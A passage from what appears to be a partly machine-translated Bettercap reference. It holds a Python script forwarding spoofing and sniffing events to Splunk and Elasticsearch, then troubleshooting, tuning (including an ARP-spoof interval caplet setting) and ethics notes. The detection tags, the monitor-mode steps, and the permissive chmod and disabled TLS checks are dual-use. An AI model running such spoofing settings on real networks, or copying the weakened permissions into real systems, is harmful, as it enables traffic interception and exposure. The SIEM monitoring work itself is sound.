"""Determine event severity"""
tag = event.get('tag', '')
high_severity_tags = ['arp.spoof', 'dns.spoof', 'wifi.deauth', 'ble.attack']
medium_severity_tags = ['http.proxy', 'https.proxy', 'net.sniff']
if tag in high_severity_tags:
return 'high'
elif tag in medium_severity_tags:
return 'medium'
else:
return 'low'
def send_to_splunk(self, events):
"""Send events to Splunk via HEC"""
if not self.config.get('splunk', \\\\{\\\\}).get('enabled', False):
return
splunk_config = self.config['splunk']
for event in events:
splunk_event = \\\\{
'time': event['timestamp'],
'source': 'bettercap',
'sourcetype': 'bettercap:event',
'index': splunk_config.get('index', 'security'),
'event': event
\\\\}
try:
response = requests.post(
splunk_config['hec_url'],
headers=\\\\{
'Authorization': f"Splunk \\\\{splunk_config['token']\\\\}",
'Content-Type': 'application/json'
\\\\},
json=splunk_event,
verify=False,
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send to Splunk: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Splunk: \\\\{e\\\\}")
def send_to_elasticsearch(self, events):
"""Send events to Elasticsearch"""
if not self.config.get('elasticsearch', \\\\{\\\\}).get('enabled', False):
return
es_config = self.config['elasticsearch']
for event in events:
index_name = f"bettercap-\\\\{datetime.now().strftime('%Y.%m.%d')\\\\}"
try:
response = requests.post(
f"\\\\{es_config['url']\\\\}/\\\\{index_name\\\\}/_doc",
json=event,
timeout=10
)
if response.status_code not in [200, 201]:
self.logger.error(f"Failed to send to Elasticsearch: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Elasticsearch: \\\\{e\\\\}")
def generate_alerts(self, events):
"""Generate alerts based on event patterns"""
alerts = []
# Group events by type and time
event_groups = \\\\{\\\\}
for event in events:
key = f"\\\\{event['event_type']\\\\}_\\\\{event.get('src_ip', 'unknown')\\\\}"
if key not in event_groups:
event_groups[key] = []
event_groups[key].append(event)
# Check for suspicious patterns
for group_key, group_events in event_groups.items():
if len(group_events) > 10: # High frequency
alerts.append(\\\\{
'alert_type': 'high_frequency_events',
'severity': 'high',
'description': f"High frequency of \\\\{group_events[0]['event_type']\\\\} events",
'event_count': len(group_events),
'time_window': '5 minutes',
'source_ip': group_events[0].get('src_ip'),
'timestamp': datetime.now().isoformat()
\\\\})
# Check for credential harvesting
credential_events = [e for e in events if 'password' in str(e).lower()]
if credential_events:
alerts.append(\\\\{
'alert_type': 'credential_harvesting',
'severity': 'critical',
'description': 'Potential credential harvesting detected',
'event_count': len(credential_events),
'timestamp': datetime.now().isoformat()
\\\\})
return alerts
def process_events(self, events_file):
"""Process Bettercap events and send to SIEM"""
self.logger.info(f"Processing events from \\\\{events_file\\\\}")
events = self.parse_bettercap_events(events_file)
if not events:
self.logger.info("No events to process")
return
self.logger.info(f"Processing \\\\{len(events)\\\\} events")
# Send to configured SIEM systems
self.send_to_splunk(events)
self.send_to_elasticsearch(events)
# Generate and send alerts
alerts = self.generate_alerts(events)
if alerts:
self.logger.info(f"Generated \\\\{len(alerts)\\\\} alerts")
for alert in alerts:
self.send_alert(alert)
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT: \\\\{alert['description']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
# Implementation depends on email configuration
pass
# Configuration
config = \\\\{
'splunk': \\\\{
'enabled': True,
'hec_url': 'https://splunk.company.com:8088/services/collector/event',
'token': 'your-hec-token',
'index': 'security'
\\\\},
'elasticsearch': \\\\{
'enabled': True,
'url': 'http://elasticsearch.company.com:9200'
\\\\},
'email': \\\\{
'enabled': False,
'smtp_server': 'smtp.company.com',
'from': 'security@company.com',
'to': 'soc@company.com'
\\\\}
\\\\}
# Usage
if __name__ == "__main__":
import sys
if len(sys.argv) != 2:
print("Usage: python3 bettercap_siem.py <events_file>")
sys.exit(1)
events_file = sys.argv[1]
integration = BettercapSIEMIntegration(config)
integration.process_events(events_file)
Troubleshooting¶
Common Issues¶
** Errores denegados por permiso:**
# Set proper capabilities
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
# Check capabilities
getcap /usr/local/bin/bettercap
# Run with sudo if capabilities don't work
sudo bettercap
# Check interface permissions
sudo chmod 666 /dev/net/tun
** Cuestiones de interés:**
# List available interfaces
ip link show
# Check interface status
ip addr show eth0
# Bring interface up
sudo ip link set eth0 up
# Check for monitor mode (WiFi)
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
Prontos problemas de carga:
# Check available modules
bettercap -help
# Update Bettercap
go install github.com/bettercap/bettercap@latest
# Check Go environment
go env GOPATH
go env GOROOT
# Verify installation
bettercap -version
bettercap -env-info
Performance Optimization¶
Optimizando el rendimiento de Bettercap:
# Increase system limits
echo "* soft nofile 65536" >> /etc/security/limits.conf
echo "* hard nofile 65536" >> /etc/security/limits.conf
# Optimize network buffers
echo 'net.core.rmem_max = 134217728' >> /etc/sysctl.conf
echo 'net.core.wmem_max = 134217728' >> /etc/sysctl.conf
echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf
sysctl -p
# Use performance caplet settings
> set net.probe.throttle 10
> set arp.spoof.interval 1s
> set ticker.period 5
Security Considerations¶
Ethical Usage¶
** Consideraciones jurídicas:** - Únicamente use Bettercap en las redes que posee o tenga permiso explícito para probar - Entender las leyes locales sobre pruebas de seguridad de la red - Obtener la autorización adecuada antes de realizar pruebas de penetración - Documentar todas las actividades de prueba con fines de cumplimiento - Respetar la privacidad y la confidencialidad de los datos capturados
** Seguridad Operacional** - Use Bettercap en entornos de prueba aislados cuando sea posible - Implementar controles adecuados de acceso para datos capturados - Almacenamiento seguro y transmisión de información confidencial - Actualizaciones periódicas de Bettercap y dependencias - Monitor de detección por sistemas de seguridad de red
Protección de datos¶
Seguridad de datos capturada - Cifrar tráfico capturado y credenciales - Implementar la eliminación segura de archivos temporales - Utilizar canales seguros para la transmisión de datos - Implementar políticas de retención de datos - Evaluaciones periódicas de la infraestructura de ensayo
Referencias¶
- [Sitio oficial de Berttercap](URL_26__
- [Bettercap GitHub Repository](URL_27__
- [Bettercap Documentation](URL_28__
- [Go Programming Language](URL_29__
- Seguridad de Red Testing Best Practices_